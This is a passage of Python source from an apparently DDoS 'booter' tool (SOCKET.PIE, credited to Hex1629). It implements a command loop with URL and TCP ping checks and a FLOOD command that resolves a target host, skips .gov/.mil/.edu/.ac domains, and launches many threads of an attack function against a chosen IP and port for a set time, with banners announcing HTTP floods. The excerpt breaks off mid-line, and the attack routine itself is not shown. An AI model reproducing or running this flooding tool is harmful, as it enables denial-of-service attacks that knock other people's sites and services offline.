╔═╗╔═╗╔═╗╦╔═╔═╗╔╦╗┌─┐┬┌─┐\n{Fore.LIGHTRED_EX} ╚═╗║ ║║ ╠╩╗║╣ ║ ├─┘│├┤ \n{Fore.WHITE} ╚═╝╚═╝╚═╝╩ ╩╚═╝ ╩o┴ ┴└─┘\n {Fore.WHITE}[{Fore.GREEN}+{Fore.WHITE}] {Fore.WHITE}< {Fore.LIGHTGREEN_EX}TYPE {prefix_get}HELP FOR SHOW COMMAND {Fore.WHITE}> {Fore.RESET}") 164 | elif args_get[0].upper() == f"{prefix_get}EXIT": 165 | print(f"{Fore.LIGHTGREEN_EX}EXIT . . .{Fore.RESET}") 166 | try: 167 | exit() 168 | except: 169 | sys.exit() 170 | elif args_get[0].upper() == f"{prefix_get}PING_URL": 171 | if len(args_get) == 2: 172 | status_code_leak = '' 173 | try: 174 | a = time.time() 175 | url = args_get[1] 176 | req = requests.get(url) 177 | b = time.time() 178 | status_code_leak = "OK" 179 | except: 180 | c = time.time() 181 | status_code_leak = 'NO' 182 | if status_code_leak == "OK": 183 | print(f"{Fore.BLUE}STATUS_CODE{Fore.WHITE}={Fore.LIGHTBLUE_EX}{req.status_code}:{req.reason} {Fore.CYAN}REQUESTS{Fore.WHITE}={Fore.LIGHTCYAN_EX}{a} MS {Fore.YELLOW}RESPONSE{Fore.WHITE}={Fore.LIGHTYELLOW_EX}{b} MS {Fore.RED}PING{Fore.WHITE}={Fore.LIGHTRED_EX}{a-b} MS{Fore.RESET}") 184 | else: 185 | print(f"{Fore.BLUE}STATUS_CODE{Fore.WHITE}={Fore.LIGHTBLUE_EX}CAN'T CONNECT {Fore.CYAN}REQUESTS{Fore.WHITE}={Fore.LIGHTCYAN_EX}{a} MS {Fore.YELLOW}RESPONSE{Fore.WHITE}={Fore.LIGHTYELLOW_EX}NULL MS {Fore.RED}PING{Fore.WHITE}={Fore.LIGHTRED_EX}NULL MS{Fore.RESET}") 186 | else: 187 | print(f"{Fore.LIGHTRED_EX}{prefix_get}PING_URL {Fore.RED}{Fore.RESET}") 188 | print(f"{Fore.LIGHTRED_EX}HEY IF YOU DDOS/DOS TO TARGET IF STRAIGHT WEBSITE\n{Fore.YELLOW}ITS MAKE PINGER STOP IF STOP YOU CAN CLOSE PYTHON ONLY AND NEXT OPEN AGAIN (OK)\n{Fore.RED}NOT BUG YOU KNOW? | [BECAUSE I CAN'T FIX]{Fore.RESET}") 189 | elif args_get[0].upper() == f"{prefix_get}PING_TCP": 190 | if len(args_get) == 3: 191 | status_code_leak = '' 192 | ip_tar = str(args_get[1]) 193 | port_tar = int(args_get[2]) 194 | s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) 195 | try: 196 | a = time.time() 197 | s.connect((ip_tar,port_tar)) 198 | b = time.time() 199 | status_code_leak = "OK" 200 | except: 201 | c = time.time() 202 | status_code_leak = 'NO' 203 | s.close() 204 | if status_code_leak == "OK": 205 | print(f"{Fore.BLUE}STATUS_CODE{Fore.WHITE}={Fore.LIGHTBLUE_EX}CONNECT {Fore.CYAN}REQUESTS{Fore.WHITE}={Fore.LIGHTCYAN_EX}{a} MS {Fore.YELLOW}RESPONSE{Fore.WHITE}={Fore.LIGHTYELLOW_EX}{b} MS {Fore.RED}PING{Fore.WHITE}={Fore.LIGHTRED_EX}{a-b} MS{Fore.RESET}") 206 | else: 207 | print(f"{Fore.BLUE}STATUS_CODE{Fore.WHITE}={Fore.LIGHTBLUE_EX}CAN'T CONNECT {Fore.CYAN}REQUESTS{Fore.WHITE}={Fore.LIGHTCYAN_EX}{a} MS {Fore.YELLOW}RESPONSE{Fore.WHITE}={Fore.LIGHTYELLOW_EX}NULL MS {Fore.RED}PING{Fore.WHITE}={Fore.LIGHTRED_EX}NULL MS{Fore.RESET}") 208 | else: 209 | print(f"{Fore.LIGHTRED_EX}{prefix_get}PING_TCP {Fore.RED} {Fore.RESET}") 210 | elif args_get[0].upper() == f"{prefix_get}FLOOD": 211 | if len(args_get) == 10: 212 | data_type_loader_packet = args_get[1].upper() 213 | target_loader = args_get[2] 214 | port_loader = int(args_get[3]) 215 | time_loader = time.time() + int(args_get[4]) 216 | spam_loader = int(args_get[5]) 217 | create_thread = int(args_get[6]) 218 | booter_sent = int(args_get[7]) 219 | methods_loader = args_get[8] 220 | spam_create_thread = int(args_get[9]) 221 | code_leak = True 222 | host = '' 223 | ip = '' 224 | try: 225 | host = str(target_loader).replace("https://", "").replace("http://", "").replace("www.", "").replace("/", "") 226 | if '.gov' in host or '.mil' in host or '.edu' in host or '.ac' in host: 227 | code_leak = False 228 | print(f"{Fore.GREEN}Uhh You Can't Attack This Website {Fore.WHITE}[ {Fore.YELLOW}.gov .mil .edu .ac {Fore.WHITE}] . . .{Fore.RESET}") 229 | else: 230 | ip = socket.gethostbyname(host) 231 | code_leak = True 232 | except socket.gaierror: 233 | code_leak = False 234 | print(f"{Fore.YELLOW}FAILED TO GET URL . . .{Fore.RESET}") 235 | if code_leak == True: 236 | for loader_num in range(create_thread): 237 | sys.stdout.write(f"\r {Fore.YELLOW}{loader_num} OF {create_thread} CREATE THREAD . . .{Fore.RESET}") 238 | sys.stdout.flush() 239 | for _ in range(spam_create_thread): 240 | threading.Thread(target=runing_attack,args=(ip,host,port_loader,time_loader,spam_loader,methods_loader,booter_sent,data_type_loader_packet)).start() 241 | status_code = True 242 | if GUI_SETUP == 0: 243 | clear_text() 244 | print(f"{Fore.LIGHTCYAN_EX}Sending Packet {Fore.CYAN}HTTP FLOOD {Fore.LIGHTCYAN_EX}To Target {Fore.WHITE}!\n\n{Fore.YELLOW} ━╦━━━━━━━━━━━━━━━━━━━━━╦━\n{Fore.LIGHTYELLOW_EX}╚═══╦╩═════════════════════╩╦═══╝\n{Fore.WHITE} ━ ━ ━ {Fore.LIGHTGREEN_EX}SENDING {Fore.WHITE}━ ━ ━ \n{Fore.LIGHTRED_EX} ╔═╩═══════════════════════╩═╗\n {Fore.GREEN}Target: {target_loader}\n {Fore.GREEN}Port: {port_loader}\n {Fore.GREEN}Type: {data_type_loader_packet}\n{Fore.RED} ╚═══════════════════════════╝\n {Fore.BLUE}@DEV {Fore.WHITE}- {Fore.LIGHTBLUE_EX}Hex1629{Fore.RESET}") 245 | elif GUI_SETUP == 3: 246 | clear_text() 247 | print(f"{Fore.YELLOW} ╔━━━━━━━━━━━━━━━━━━━━━╗\n {Fore.BLUE}DEV {Fore.WHITE}━ {Fore.CYAN}HEX1629 \n{Fore.LIGHTYELLOW_EX} ╚━╦━━━━━━━━━━━━━━━━━╦━╝\n{Fore.LIGHTRED_EX}╦━━━━╩━━━━━━━━━━━━━━━━━╩━━━━╦\n {Fore.LIGHTGREEN_EX} TARGET {Fore.WHITE}━ {Fore.GREEN}{target_loader}\n {Fore.LIGHTGREEN_EX} PORT {Fore.WHITE}─ {Fore.GREEN}{port_loader}\n {Fore.LIGHTGREEN_EX}TIME {Fore.WHITE}━ {Fore.GREEN}{time_loader}\n{Fore.RED}╩━━━━━━━━━━━━━━━━━━━━━━━━━━━╩{Fore.RESET}") 248 | elif GUI_SETUP == 1: 249 | print(f"\n{Fore.MAGENTA}[{Fore.WHITE}SOCKET.PIE{Fore.MAGENTA}]{Fore.WHITE} Send {Fore.WHITE}<{Fore.GREEN}{data_type_loader_packet}{Fore.WHITE}> {Fore.WHITE}to {Fore.RED}{ip}:{port_loader}") 250 | elif GUI_SETUP == 2: 251 | print(f"\n{Fore.MAGENTA}[{Fore.WHITE}!{Fore.MAGENTA}]{Fore.WHITE} Send attack to {Fore.RED}{ip}:{port_loader} {Fore.MAGENTA}[{Fore.WHITE}!{Fore.MAGENTA}]{Fore.RESET}") 252 | else: 253 | print(f"{Fore.RED}{prefix_get}FLOOD